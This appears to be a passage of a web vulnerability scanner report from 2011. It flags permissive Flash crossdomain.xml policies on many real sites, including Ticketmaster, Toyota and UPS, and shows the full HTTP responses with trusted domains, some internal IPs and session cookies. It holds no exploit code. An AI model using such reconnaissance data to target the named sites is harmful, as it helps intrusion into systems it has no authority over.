HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:13:57 GMT Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a Last-Modified: Thu, 28 Oct 2010 18:08:21 GMT ETag: "2f1af0-b0-493b13a276f40" Accept-Ranges: bytes Content-Length: 176 Vary: Accept-Encoding Connection: close Content-Type: application/xml <cross-domain-policy> <allow-access-from domain="*.aol.com"/> <allow-access-from domain="*.aolcdn.com"/> <allow-access-from domain="*.yourminis.com"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.tasteofhome |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.tasteofhome.com |
HTTP/1.1 200 OK Connection: close Date: Sat, 02 Apr 2011 13:51:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: application/xml; charset=utf-8 Content-Length: 430 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="72.3.226.28" secure="true" /> ...[SNIP]... <allow-access-from domain="*.isg-marketing.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.tasteofhome.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.reimanpub.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.telegraph.co |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.telegraph.co.uk |
HTTP/1.0 200 OK Server: Apache ETag: W/"1150-1301643454000" Last-Modified: Fri, 01 Apr 2011 07:37:34 GMT Content-Length: 1150 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:34:59 GMT Connection: close <cross-domain-policy> <allow-access-from domain="telegraph.co.uk"/> <allow-access-from domain="*.telegraph.co.uk"/> <allow-access-from domain="telegraphquiz.cfmx <allow-access-from domain="213.187.32.58"/> <allow-access-from domain="213.187.48.185"/> <allow-access-from domain="tgquiz.pavo.flarecreative <allow-access-from domain="ad.uk.doubleclick.net"/> <allow-access-from domain="st.sand.msn-int.com" secure="true"/> <allow-access-from domain="*.msn.com" secure="true"/> <allow-access-from domain="services.brightcove.com"/> <allow-access-from domain="admin.brightcove.com"/> <allow-access-from domain="*.videoegg.com"/> <allow-access-from domain="*.bebo.com"/> <allow-access-from domain="*.hi5.com"/> <allow-access-from domain="*.wayn.com"/> <allow-access-from domain="*.tagged.com"/> <allow-access-from domain="*.ringo.com"/> <allow-access-from domain="dailytelegraph.accuw <allow-access-from domain="skin.issuu.com" /> <allow-access-from domain="static.issuu.com" /> <allow-access-from domain="bestbuys.tmg.s3.amazonaws <allow-access-from domain="*.washingtonpost.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.thefrisky.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.thefrisky.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (Red Hat) Last-Modified: Wed, 19 May 2010 20:33:54 GMT ETag: "1ad31f-ff-486f86063b080" Accept-Ranges: bytes Content-Length: 255 Content-Type: text/xml Cache-Control: max-age=208322 Date: Sat, 02 Apr 2011 13:33:13 GMT Connection: close Vary: Accept-Encoding <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.turner.com" /> <allow-access-from domain="*.thefrisky.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.thirdage.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.thirdage.com |
HTTP/1.1 200 OK Server: Apache X-Varnish: 635032720 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/xml Date: Sat, 02 Apr 2011 13:40:55 GMT Expires: Sun, 11 Mar 1984 12:00:00 GMT X-Drupal-Cache: MISS X-Varnish-Cache: MISS Web-Head: web09.advomatic.com Via: 1.1 varnish Connection: close Last-Modified: Sat, 02 Apr 2011 13:40:55 +0000 X-Powered-By: PHP/5.2.6-1+lenny9 Age: 0 Content-Length: 267 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.thirdage.com" /> <allow-access-from domain="*.www.thirdage.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.ticketmaster |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ticketmaster.com |
HTTP/1.0 200 OK Server: Apache X-TM-GTM-Origin: tmol-us-ash1 Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT ETag: "4c3-b383d900" Accept-Ranges: bytes Content-Length: 1219 Content-Type: text/xml Date: Sat, 02 Apr 2011 13:24:52 GMT Connection: close Set-Cookie: SID=jrXWRzktqCwRzz16 Set-Cookie: BID=5RMDQStWthnUtUuX Set-Cookie: CMPS=XrPER0aDfUK1iRL <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.ticketmaster.co.nz" /> <allow-access-from domain="*.ticketmaster.co.uk" /> <allow-access-from domain="*.ticketmaster.com" /> <allow-access-from domain="*.ticketmaster.com.au" /> <allow-access-from domain="*.ticketmaster.com.mx" /> <allow-access-from domain="*.ticketmaster.de" /> <allow-access-from domain="*.ticketmaster.ie" /> <allow-access-from domain="*.ticketmaster.es" /> <allow-access-from domain="*.ticketmaster.eu" /> <allow-access-from domain="*.ticketmaster.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.tmcs" secure="false" /> ...[SNIP]... <allow-access-from domain="ticketmaster.com" /> ...[SNIP]... <allow-access-from domain="ticketmaster.de" /> <allow-access-from domain="ticketmaster.ie" /> <allow-access-from domain="ticketmaster.es" /> <allow-access-from domain="ticketmaster.eu" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.tigerdirect |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.tigerdirect.com |
HTTP/1.0 200 OK Content-Length: 794 Content-Type: text/xml Last-Modified: Fri, 10 Sep 2010 18:55:14 GMT Accept-Ranges: bytes ETag: "38d3bcb31951cb1:8574" Server: Microsoft-IIS/6.0 X-SV: MIA03A X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:37:17 GMT Connection: close Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.compusa.com" /> <allow-access-from domain="*.compusa.pr" /> <allow-access-from domain="images.highspeedbackbone ...[SNIP]... <allow-access-from domain="retail.tigerdirect.com" /> <allow-access-from domain="www.tigerdirect.ca" /> <allow-access-from domain="retail.tigertirect.ca" /> <allow-access-from domain="www.circuitcity.com" /> <allow-access-from domain="com.puter.tv" /> <allow-access-from domain="compusa.tv" /> <allow-access-from domain="pinkfriday.org" /> <allow-access-from domain="charitypcrace.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.tinypic.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.tinypic.com |
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Sat, 02 Apr 2011 13:37:28 GMT Content-Type: text/xml Connection: close Last-Modified: Fri, 17 Apr 2009 13:33:18 GMT ETag: "394-39350380" Accept-Ranges: bytes Content-Length: 916 Age: 234 X-Cache: HIT from tinypic.com Via: 1.0 den2tpsq04:80 (squid) <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.quantserve.com"/> <allow-access-from domain="*.tinypic.com" /> <allow-access-from domain="tinypic.com" /> <allow-access-from domain="*.photobucket.com" /> <allow-access-from domain="photobucket.com" /> <allow-access-from domain="*.dancejam.com" /> <allow-access-from domain="dancejam.com" /> <allow-access-from domain="*.fotoflexer.com"/> <allow-access-from domain="fotoflexer.com"/> <allow-access-from domain="*.flektor.com"/> <allow-access-from domain="flektor.com"/> <allow-access-from domain="*.picnik.com"/> <allow-access-from domain="picnik.com"/> <allow-access-from domain="*.glogster.com"/> <allow-access-from domain="glogster.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.tmz.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.tmz.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:43:29 GMT Server: Apache Last-Modified: Wed, 19 May 2010 19:01:17 GMT ETag: "12383e6-3c6-486f715 Accept-Ranges: bytes Content-Length: 966 Connection: close Content-Type: application/xml Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Cache-control: private <cross-domain-policy> <allow-access-from domain="*.tmz.com"/> <allow-access-from domain="*.tmzdev.com"/> <allow-access-from domain="*.blogsmithmedia.com"/> <allow-access-from domain="*.aolcdn.com"/> <allow-access-from domain="*.symbolforce.com"/> <allow-access-from domain="*.yourminis.com"/> <allow-access-from domain="*.tmz.vo.llnwd.net"/> <allow-access-from domain="creative.myspace.com"/> <allow-access-from domain="*.myspace.com"/> <allow-access-from domain="creative.myspacecdn.com"/> <allow-access-from domain="*.myspacecdn.com"/> <allow-access-from domain="*.interpolls.com"/> <allow-access-from domain="*.celebritytweet.com"/> <allow-access-from domain="adserver.adtechus.com"/> <allow-access-from domain="aka-cdn-ns.adtechus.com"/> <allow-access-from domain="cdn.tremormedia.com"/> <allow-access-from domain="adserver.adtech.de"/> <allow-access-from domain="aka-cdn-ns.adtech.de"/> <allow-access-from domain="t-ll-assets.cfec2.net"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.toptenreviews |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.toptenreviews.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:43:38 GMT Server: Apache Last-Modified: Thu, 05 Nov 2009 17:31:54 GMT ETag: "6a4059-153-477a31a739680 Accept-Ranges: bytes Content-Length: 339 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0" encoding="iso-8859-1"?> <cross-domain-policy xmlns:xsi="http://www.w3 xsi:noNamespaceSchem ...[SNIP]... <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="*.googlesyndication.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.toyota.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.toyota.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Mon, 11 Oct 2010 22:20:04 GMT ETag: "2515a-487-c30f8d00" Accept-Ranges: bytes Content-Length: 1159 Content-Type: application/xml X-N: S Date: Sat, 02 Apr 2011 13:50:25 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="toyota.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.toyota.com" secure="false" /> ...[SNIP]... <allow-access-from domain="toyotareasons.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.toyotareasons.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.akamai.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.firstbornmultimedia.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.doubleclick.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.doubleclick.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.2mdn.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.ichameleongroup.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*. clearspring.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*. lolzllc.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.toysrus.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.toysrus.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:32:24 GMT Server: Apache/2.0.63 (Unix) Last-Modified: Thu, 22 Jul 2010 08:45:04 GMT ETag: "540db5-39b-48bf5ef3f6400 Accept-Ranges: bytes Content-Length: 923 Cache-Control: max-age=172800 Expires: Mon, 04 Apr 2011 13:32:24 GMT Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: application/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="www.toysrus.com" /> <allow-access-from domain="www.babiesrus.com" /> <allow-access-from domain="trus.imageg.net" /> <allow-access-from domain="*.gsipartners.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.gspt.net" secure="true" /> ...[SNIP]... <allow-access-from domain="63.240.110.201" /> <allow-access-from domain="206.16.220.201" /> <allow-access-from domain="172.20.1.201" /> <allow-access-from domain="172.21.1.201" /> <allow-access-from domain="vqascweb1.crossmedia ...[SNIP]... <allow-access-from domain="vqascweb2.crossmedia ...[SNIP]... <allow-access-from domain="toysrus.shoplocal.com" secure="true" /> ...[SNIP]... <allow-access-from domain="beta.crossmediaservices ...[SNIP]... <allow-access-from domain="*.fetchback.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.tracfone.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.tracfone.com |
HTTP/1.1 200 OK Set-Cookie: TFWirelessA=R2994269697; path=/; expires=Sat, 02-Apr-2011 14:03:25 GMT Connection: close Date: Sat, 02 Apr 2011 13:33:19 GMT Content-Length: 568 Last-Modified: Wed, 04 Mar 2009 22:02:34 GMT x-wily-servlet: Clear appServerIp=10.248.45.15 Set-Cookie: TLTSID=F445257AC78A7 Set-Cookie: TLTUID=721D822B71F81 X-Powered-By: Servlet/2.5 JSP/2.1 x-wily-info: Clear guid=166AF8780AF82D0 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.redcated" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.travelocity |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.travelocity.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:28:08 GMT Server: Apache Set-Cookie: TVLY_GEO=|||||; path=/; domain=.travelocity.com; expires=Sat, 02-Apr-2011 16:28:08 GMT Set-Cookie: tyrg1st=668553C086D10CAB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.travelocity.com Set-Cookie: SID=T000V00000X90094 Last-Modified: Tue, 24 Mar 2009 05:46:07 GMT ETag: "5a7" Accept-Ranges: bytes Content-Length: 1447 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="i.travelpn.com.edgesuite ...[SNIP]... <allow-access-from domain="i.travelpn.com" secure="false"/> ...[SNIP]... <allow-access-from domain="i.travelocity.com ...[SNIP]... <allow-access-from domain="i.travelocity.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.travelocity.com" secure="false"/> ...[SNIP]... <allow-access-from domain="i.travelocity.com" secure="false"/> ...[SNIP]... <allow-access-from domain="travel.travelocity.com" secure="false"/> ...[SNIP]... <allow-access-from domain="ag.travelocity.com ...[SNIP]... <allow-access-from domain="hg.travelocity.com ...[SNIP]... <allow-access-from domain="design.int.travelocity ...[SNIP]... <allow-access-from domain="*.2mdn.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="ad.*.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.travelpn.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.aolcdn.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.dotomi.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.tripadvisor |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.tripadvisor.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:43:18 GMT Server: Apache Last-Modified: Mon, 06 Dec 2010 12:09:15 GMT Accept-Ranges: bytes Content-Length: 357 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.daodao.com" /> <allow-access-from domain="*.ddcdn.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="*.tripadvisor.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.true.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.true.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Mon, 29 Jun 2009 15:30:26 GMT Accept-Ranges: bytes ETag: "9a1cbc86cef8c91:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:37:40 GMT Connection: keep-alive Content-Length: 576 Set-Cookie: NSC_xxx-mc-hsq=44533 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <!--The site-control element defines the meta-policy for ...[SNIP]... <allow-access-from domain="*.truebeginnings.com" /> <allow-access-from domain="*.true.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.trulia.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.trulia.com |
HTTP/1.0 200 OK Server: Apache/2.2.15 (EL) Last-Modified: Wed, 30 Mar 2011 22:59:11 GMT ETag: "1582730-192-49fbb1f Accept-Ranges: bytes Content-Length: 402 Content-Type: text/xml Date: Sat, 02 Apr 2011 13:35:54 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.trulia.com" /> <allow-access-from domain="*.trulia.com" /> <allow-access-from domain="*.trulia-cdn.com" /> <allow-access-from domain="*.stamen.com" /> <allow-access-from domain="*.2mdn.net"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.tv.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.tv.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:34:34 GMT Server: Apache Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 465 Keep-Alive: timeout=15, max=995 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="image.com.com" /> <allow-access-from domain="img.gamespot.com" /> <allow-access-from domain="i.i.com.com" /> <allow-access-from domain="*.cnet.com" /> <allow-access-from domain="*.cbs.com" /> <allow-access-from domain="*.cooliris.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.tvguide.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.tvguide.com |
HTTP/1.0 200 OK Content-Length: 1209 Content-Type: text/xml Last-Modified: Thu, 29 Jul 2010 23:00:39 GMT Accept-Ranges: bytes ETag: "3647dcdc712fcb1:1a2d" Server: Microsoft-IIS/6.0 P3P: policyref=" /w3c/p3p.xml", CP="CAO PSA OUR BUS" X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:25:54 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.tvguide.com" secure="false" /> ...[SNIP]... <allow-access-from domain="tvguide.com" secure="false" /> ...[SNIP]... <allow-access-from domain="cmsauthor.tvguide.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.arkadium.com/*" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="testing.arkadium.com/*" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.bignetworkboss.com/*" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.mtumi.dev" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.motiontek.dev" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.motiontek.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.2mdn.net" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.maven.net" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.maventechnologies.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.mavenapps.net" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.cooliris.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.univision.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.univision.com |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 02 Apr 2011 13:54:19 GMT Content-length: 432 Content-type: text/xml Last-modified: Mon, 20 Dec 2010 16:16:47 GMT Connection: keep-alive <?xml version="1.0"?> <!-- http://www.univision.com <cross-domain-policy> <allow-access-from domain="*.univision.com" /> <allow-access-from domain="*.clearspring.com" /> <allow-access-from domain="*.streamtheworld.com" /> <allow-access-from domain="*.streamtheworld.net" /> <allow-access-from domain="*.myspacecdn.com"/> <allow-access-from domain="*.uvnimg.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.ups.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ups.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:23:16 GMT Server: Apache Last-Modified: Sun, 04 Jan 2009 01:06:17 GMT Accept-Ranges: bytes Content-Length: 104 Vary: User-Agent Connection: close Content-Type: text/xml <cross-domain-policy> <allow-access-from domain="*.ups.com" secure="false"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.usatoday.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.usatoday.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT Accept-Ranges: bytes ETag: "befaf11117e4cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Sat, 02 Apr 2011 13:32:44 GMT Connection: close Content-Length: 1558 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.usatoday.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.usatoday.net" secure="true"/> ...[SNIP]... <allow-access-from domain="projects.usatoday.com"/> <allow-access-from domain="*.gannettonline.com"/> <allow-access-from domain="www.smashingideas.com" secure="true"/> ...[SNIP]... <allow-access-from domain="beta.tagware.com" secure="true"/> ...[SNIP]... <allow-access-from domain="nmp.newsgator.com" secure="true"/> ...[SNIP]... <allow-access-from domain="maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="hostlogic.ca" secure="true"/> ...[SNIP]... <allow-access-from domain="pages.samsung.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="demo.pointroll.net" /> <allow-access-from domain="*.brightcove.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.metagrapher.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.use.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.use.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:39:20 GMT Server: Apache/2.2.9 (Fedora) Last-Modified: Wed, 19 May 2010 22:07:28 GMT Accept-Ranges: bytes Content-Length: 185 Connection: close Content-Type: text/xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy> <allow-access-from domain="*.torontoflex.com" /> <allow-access-from domain="*.use.com" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.usgs.gov |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.usgs.gov |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:45:32 GMT Content-Length: 224 Content-Type: application/xml ETag: "38331e46-e0-47fbc40 Last-Modified: Tue, 16 Feb 2010 18:53:41 GMT Accept-Ranges: bytes Server: Footprint Distributor V4.6 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*.usgs.gov" to-ports="80" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.usmagazine.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.usmagazine.com |
HTTP/1.0 200 OK Server: Apache/2.2.11 (Unix) DAV/2 mod_jk/1.2.28 PHP/5.2.10 Last-Modified: Tue, 08 Feb 2011 20:21:10 GMT ETag: "e254e7-2d3-49bcb16cc5980 Content-Type: application/xml Content-Length: 723 X-Varnish: 246730193 246729216 Date: Sat, 02 Apr 2011 13:26:43 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.2mdn.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.dartmotif.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.doubleclick.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.doubleclick.com" secure="true"/> <allow-access-from domain="*.doubleclick.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.2mdn.net" secure="true"/> <allow-access-from domain="*.dartmotif.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.gstatic.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.vast.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.vast.com |
HTTP/1.1 200 OK ETag: "1ae1a37-16d-49f03a2 P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa CONi TELi OUR BUS IND PHY ONL UNI COM NAV INT DEM STA" Accept-Ranges: bytes Content-Length: 365 Date: Sat, 02 Apr 2011 13:43:38 GMT Connection: close Last-Modified: Mon, 21 Mar 2011 20:04:35 GMT Server: Apache Content-Type: text/xml Keep-Alive: timeout=15, max=78 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.aolcdn.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.verizon.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.verizon.net |
HTTP/1.0 200 OK Content-Length: 375 Content-Type: text/xml Last-Modified: Wed, 28 Oct 2009 19:15:58 GMT Accept-Ranges: bytes ETag: "02b2b14358ca1:138d" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Expires: Sat, 02 Apr 2011 13:37:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:37:47 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-http-request ...[SNIP]... <allow-access-from domain="*.verizon.net" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.verizon.com" to-ports="*" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.victorias |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.victoriassecret.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Fri, 09 Jul 2010 16:21:39 GMT ETag: "147-48af6cc2e0ac0" Accept-Ranges: bytes Content-Length: 327 SID: 502 Content-Type: application/xml P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS UNI PUR NAV INT STA PRE OTC" Cache-Control: max-age=1800 Date: Sat, 02 Apr 2011 13:42:33 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.vspink.com" /> <allow-access-from domain="*.vspink.resource.com" /> <allow-access-from domain="*.vspinknew.resource.com" /> <allow-access-from domain="*.victoriassecret.com"/> <allow-access-from domain="*.limited.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.videobash.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.videobash.com |
